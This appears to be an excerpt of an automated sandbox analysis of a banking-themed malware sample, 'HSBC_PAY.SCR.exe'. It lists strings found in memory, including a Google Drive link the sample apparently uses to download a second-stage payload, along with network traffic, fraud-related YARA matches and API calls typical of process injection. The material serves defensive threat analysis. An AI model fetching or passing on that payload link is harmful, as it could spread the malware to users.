Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1720114378.0000000021DE0000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1702719653.000000007EFEA000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.000000002080C000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp, uzonfntK.pif.0.drString found in binary or memory: http://ocsp.comodoca.com0$
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1720114378.0000000021DE0000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1702719653.000000007EFEA000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.000000002080C000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000002.2056661280.00000000207C3000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp, uzonfntK.pif.0.drString found in binary or memory: http://www.pmail.com0
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.000000000059E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.000000002086D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.000000002080C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8#
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8&export=download
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.00000000005FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8&export=downloadm
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.0000000000631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com:443/download?id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8&export=downlo
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: Yara matchFile source: Process Memory Space: HSBC_PAY.SCR.exe PID: 6808, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: uzonfntK.pif PID: 3548, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: uzonfntK.pif PID: 2844, type: MEMORYSTR

E-Banking Fraud

Source: Yara match | File source: 3.2.uzonfntK.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.uzonfntK.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.uzonfntK.pif.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.uzonfntK.pif.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.uzonfntK.pif.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.uzonfntK.pif.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2140430291.00000000292F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2255713355.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2214229432.000000001E430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2280734227.0000000028280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2197880197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A9824C NtReadVirtualMemory,0_2_02A9824C
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A984BC NtUnmapViewOfSection,0_2_02A984BC
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A9DAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02A9DAC4
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A9DA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02A9DA3C
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A9DBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02A9DBA8
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A98BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02A98BA8
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A979AC NtAllocateVirtualMemory,0_2_02A979AC
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A97CF8 NtWriteVirtualMemory,0_2_02A97CF8
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A98BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02A98BA6
